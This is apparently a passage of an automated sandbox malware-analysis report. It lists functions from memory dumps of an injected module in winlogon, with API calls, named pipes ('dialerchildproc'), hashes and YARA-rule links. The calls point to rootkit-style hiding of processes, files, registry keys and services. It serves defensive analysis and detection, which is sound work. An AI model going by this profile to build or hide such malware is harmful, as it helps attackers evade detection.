NtEnumerateKey, xrefs: 000002EA8A691F59
sechost.dll, xrefs: 000002EA8A691FD9
NtQueryDirectoryFile, xrefs: 000002EA8A691F1F
NtDeviceIoControlFile, xrefs: 000002EA8A691FF6
advapi32.dll, xrefs: 000002EA8A691F97, 000002EA8A691FB8
EnumServicesStatusExW, xrefs: 000002EA8A691FB1, 000002EA8A691FD2
NtQuerySystemInformation, xrefs: 000002EA8A691EE5
ntdll.dll, xrefs: 000002EA8A691ECD
EnumServiceGroupW, xrefs: 000002EA8A691F90

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 032f23cc106d15bfc10b7335e8608da800b8efca52cbe3625d6d917c6cf048fe
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 0731E7646D19CAA0FFC4DF64E8596D86321B754384F8894B3961F0216DAF3CB25DE342

Function 000002EA8A6923F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002EA8A692405
GetCurrentProcessId.KERNEL32 ref: 000002EA8A69240F

Part of subcall function 000002EA8A6919AC: OpenProcess.KERNEL32 ref: 000002EA8A6919CA
Part of subcall function 000002EA8A6919AC: IsWow64Process.KERNEL32 ref: 000002EA8A6919E0
Part of subcall function 000002EA8A6919AC: CloseHandle.KERNEL32 ref: 000002EA8A6919FB

CreateFileW.KERNEL32 ref: 000002EA8A692468
WriteFile.KERNEL32 ref: 000002EA8A692490
ReadFile.KERNEL32 ref: 000002EA8A6924AF
CloseHandle.KERNEL32 ref: 000002EA8A6924B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002EA8A69243F
\\.\pipe\dialerchildproc64, xrefs: 000002EA8A692438

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: d7bf79745f2eb27701b83dacf0c02f642d617f0e0bc21ec14e74c897d5c09cf2
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 3E21413575478183FB90CB25F54835AB3A0F389BA4F544265DA6E02BACDF3CE149CB01

Function 000002EA8A69104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002EA8A6910AB
RegEnumValueW.ADVAPI32 ref: 000002EA8A69110E
GetProcessHeap.KERNEL32 ref: 000002EA8A691155
HeapAlloc.KERNEL32 ref: 000002EA8A691163
GetProcessHeap.KERNEL32 ref: 000002EA8A691187
HeapFree.KERNEL32 ref: 000002EA8A691195

Strings

d, xrefs: 000002EA8A6910CE

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: e78d5995f936f721d832b5ba15ffd8a056ce478808306a2282fb18531c3e8655
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: FF417F33254BC097EBA4CF62E44879AB7A1F388B94F148125DB8A07B58DF38E565CB00

Function 000002EA8A6669F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002EA8A666A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002EA8A666A6A
_RTC_Initialize.LIBCMT ref: 000002EA8A666A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002EA8A666ABE
__scrt_release_startup_lock.LIBCMT ref: 000002EA8A666AE9

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 929abeb9e41ac65d2fc05d7e14602cc274b4c0ccdd1d752f5dd7d29bc6d44ba2
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 158124B56906C186FFE8EF26F84835963D1EB85780F4481B5AA0F4379EDB39E8458703

Function 000002EA8A6E69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002EA8A6E6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002EA8A6E6A6A
_RTC_Initialize.LIBCMT ref: 000002EA8A6E6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002EA8A6E6ABE
__scrt_release_startup_lock.LIBCMT ref: 000002EA8A6E6AE9

Memory Dump Source

Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 9e52156f4434568156d2b1ffd70f63e5ad1274ab3848845171c0cca0e75123d1
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9C81F1656802C186FFD0FB29E84D39962D1EB45B80F3444B5BA0F4779EDB38F8668702

Function 000002EA8A6975F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002EA8A697618
__scrt_acquire_startup_lock.LIBCMT ref: 000002EA8A69766A
_RTC_Initialize.LIBCMT ref: 000002EA8A697698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002EA8A6976BE
__scrt_release_startup_lock.LIBCMT ref: 000002EA8A6976E9

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: a02beb65d884c247f076919a903f28efd0885f6e9964ca6d73142cab55395d46
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 6F818021B846C186FED4DB65D84D3A96290AB857A0F1CC4F59A0F8779EDA3CF8439703

Function 000002EA8A699804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002EA8A699889
GetLastError.KERNEL32 ref: 000002EA8A699897
LoadLibraryExW.KERNEL32 ref: 000002EA8A6998C1
FreeLibrary.KERNEL32 ref: 000002EA8A699907
GetProcAddress.KERNEL32 ref: 000002EA8A699913

Strings

api-ms-, xrefs: 000002EA8A6998A9

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: c8172244d7be525140fda3bea0f6854a91c95e6875ea09be03cef69671462014
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 65317236352AD1D1EE91DB12E8087996294FB48BA0F5D85799D2F4A3A8DF3CE4458302

Function 000002EA8A6A1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002EA8A6A1BCD
GetLastError.KERNEL32 ref: 000002EA8A6A1BD9
CloseHandle.KERNEL32 ref: 000002EA8A6A1BF1
CreateFileW.KERNEL32 ref: 000002EA8A6A1C1C
WriteConsoleW.KERNEL32 ref: 000002EA8A6A1C3B

Strings

CONOUT$, xrefs: 000002EA8A6A1BFD

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 8e0cd27402a04a559e4baf4f4197540bbc2342e73089af43648c33c1861ff0fe
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 8B118C22354B8086EB90CB56E848319B2A0F788FE4F144274EA6F877A8DF78E9449745

Function 000002EA8A6930B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002EA8A6930D7
HeapAlloc.KERNEL32 ref: 000002EA8A6930EA
StrCmpNIW.SHLWAPI ref: 000002EA8A69316B
GetProcessHeap.KERNEL32 ref: 000002EA8A6931D1
HeapFree.KERNEL32 ref: 000002EA8A6931DF

Strings

dialer, xrefs: 000002EA8A693164

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: a416b012e27badd84e8c7378111370d87a9436c7268b58d8cbcb215037abf592
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 4A31A625741B9692EF95DF66E94826973A0FB44B84F0880749E4E07B68EF3CE8A5C701

Function 000002EA8A691A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002EA8A691A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002EA8A691A58
PathFindFileNameW.SHLWAPI ref: 000002EA8A691A67
lstrlenW.KERNEL32 ref: 000002EA8A691A73
StrCpyW.SHLWAPI ref: 000002EA8A691A86
CloseHandle.KERNEL32 ref: 000002EA8A691A94

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: bf6d92317d2f7dd463c1ea37d1fe5c62319c7223f9f9b417d5a599194312f91a
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 6C018C25340A8296EF90DB12E85C39A63A1F788FC0F588075CE9F43758DE3DE989C701

Function 000002EA8A6937AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002EA8A6937C8
GetCurrentProcess.KERNEL32 ref: 000002EA8A6937D6
VirtualProtectEx.KERNEL32 ref: 000002EA8A6937F8
GetCurrentProcess.KERNEL32 ref: 000002EA8A693819
VirtualProtectEx.KERNEL32 ref: 000002EA8A69383A
TerminateThread.KERNEL32 ref: 000002EA8A693849

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 3abf38151c154e8aef218ac895b1326f019ccc0d83d3465d5709b47cef8f8e4c
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 65111B6975178286EFA4DB21E41D71AA6A0BB49B85F0444B8C95F47758EF3CE408D702

Function 000002EA8A6990D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002EA8A699103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002EA8A699198
RtlUnwindEx.NTDLL ref: 000002EA8A6991E7

Strings

csm, xrefs: 000002EA8A69917E
f, xrefs: 000002EA8A699116

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 0ca824b3be79e49c2352c9f3615b16e66517e81ee8c51bffa4bb02005598cf1c
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: B8517A33262A80CAEF94CB25E44CB5937A5F344B98F58C1B09A5F477ACDB39E841C702

Function 000002EA8A691AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002EA8A691AD8
StrCmpNIW.SHLWAPI ref: 000002EA8A691AF2
lstrlenW.KERNEL32 ref: 000002EA8A691B01
StrCpyW.SHLWAPI ref: 000002EA8A691B16

Strings

\\?\, xrefs: 000002EA8A691AE6

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: d10c139b87792e473a19dd594bf67781374ee4b3761ccc206e9d8f3cc7ef59fe
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: A7F04F623446C292EFA0CB21F4983596761F754B88F88C071CA4F46A5CDE6CEA89CB01

Function 000002EA8A693200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002EA8A693222
StrCpyW.SHLWAPI ref: 000002EA8A693232
StrCatW.SHLWAPI ref: 000002EA8A69323E
PathCombineW.SHLWAPI ref: 000002EA8A69324C

Strings

\\.\pipe\, xrefs: 000002EA8A693218

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 8d3743f9d50d8670a7c68ec81a8e45ba57bf6a8dbb36366571e292f58eec91cc
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 5AF08224344BC291EE80CB23F90C119A661EB49FD0F089171DE6F47B2CCE2CE4419301

Function 000002EA8A69A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002EA8A69A154
GetProcAddress.KERNEL32 ref: 000002EA8A69A16A
FreeLibrary.KERNEL32 ref: 000002EA8A69A187

Strings

CorExitProcess, xrefs: 000002EA8A69A163
mscoree.dll, xrefs: 000002EA8A69A14B

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 7c2fdea382859e594b3b1795dd617bd906a3fe67646aa81b14d8f95b8963db95
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 32F01265351AC591EFD8CF60E88C36523A0EB58B90F486079951F45569DF2CF489D702

Function 000002EA8A6A0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002EA8A6A08A2
GetConsoleMode.KERNEL32 ref: 000002EA8A6A0960
GetLastError.KERNEL32 ref: 000002EA8A6A09EA

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: aebce3f7f8840781b94f5ffb6a41ce1d5e128e542a5c570418172882480f04b6
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: A581C22269069089FFD0DF65D8583AD27A1F744B84F4A41B6DE0F5379ADB3CB441E312

Function 000002EA8A6957F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002EA8A695806

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction ID: 9283d5c99567a10095c086f3edb267925e237d5e2e07b45a7743339773e2eb7e
Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction Fuzzy Hash: C561DA36559BC0CAEBA0DB15E44831AB7A0F388754F145165EB8E47BACCB7CE544CF02

Function 000002EA8A6712B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002EA8A6712E0
_set_statfp.LIBCMT ref: 000002EA8A6712FB
_set_statfp.LIBCMT ref: 000002EA8A671317
_set_statfp.LIBCMT ref: 000002EA8A671353

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: c4dbf1ef9b738c117e9bcd1c2fe79b5b41b77d0f96006122993a591555388720
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4D11A322AF4A8001FEE49175E85E3691143AB54374F5807B7AA7F06BFE8F18AD824102

Function 000002EA8A6F12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002EA8A6F12E0
_set_statfp.LIBCMT ref: 000002EA8A6F12FB
_set_statfp.LIBCMT ref: 000002EA8A6F1317
_set_statfp.LIBCMT ref: 000002EA8A6F1353

Memory Dump Source

Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: b6978cd87ef7d327d29120f93200a48109407cdf9d8858e658eafa2b24560136
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: C711A523AD4EC101FEE49169E55E3A91041BB643F4F484EB5AF7F46BDE8A19AC424203

Function 000002EA8A6A1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002EA8A6A1EE0
_set_statfp.LIBCMT ref: 000002EA8A6A1EFB
_set_statfp.LIBCMT ref: 000002EA8A6A1F17
_set_statfp.LIBCMT ref: 000002EA8A6A1F53

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 443fd3195c64268a462d32b78855740fa91136430c9d003a72b22592d8d8f5aa
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 6D118222AD5AC102FFE89168E55E36950917B75774F0846F4BA7F063EE8B58BC426203

Function 000002EA8A6684F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002EA8A668503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002EA8A668598

Strings

csm, xrefs: 000002EA8A66857E
f, xrefs: 000002EA8A668516

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: b7b37d97d4a01511fb4f9e784d6bf8283def48ac70b9561eb00e021ffd951605
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 6951AC326526908BEF94CF35E848B193395F394B98F5581B4DA4F8778CEB74E8818706

Function 000002EA8A6E84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002EA8A6E8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002EA8A6E8598

Strings

f, xrefs: 000002EA8A6E8516
csm, xrefs: 000002EA8A6E857E

Memory Dump Source

Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 5420a317d32a2987ba770dc99d934f514778891e0312707ba824731d2fc10ef6
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 0951BE326526908BEF94EF25E448B183395F350B98FA181B4EA1F4378CEB35E851C706

Function 000002EA8A6684D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002EA8A668503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002EA8A668598

Strings

csm, xrefs: 000002EA8A66857E
f, xrefs: 000002EA8A668516

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 528d34e4007dcb88334e2e1cd35f67450e1754ac72acfa919a06a48433f35598
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 5B31BF722516C08BEF94DF36E84871937A5F784B88F058164AE5F0778CEB38E940CB06

Function 000002EA8A6E84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002EA8A6E8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002EA8A6E8598

Strings

f, xrefs: 000002EA8A6E8516
csm, xrefs: 000002EA8A6E857E

Memory Dump Source

Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: a538edcb9c2ba697377814444eed5fa90c7ab5e1c5f51c75adb5ce8ac331327a
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
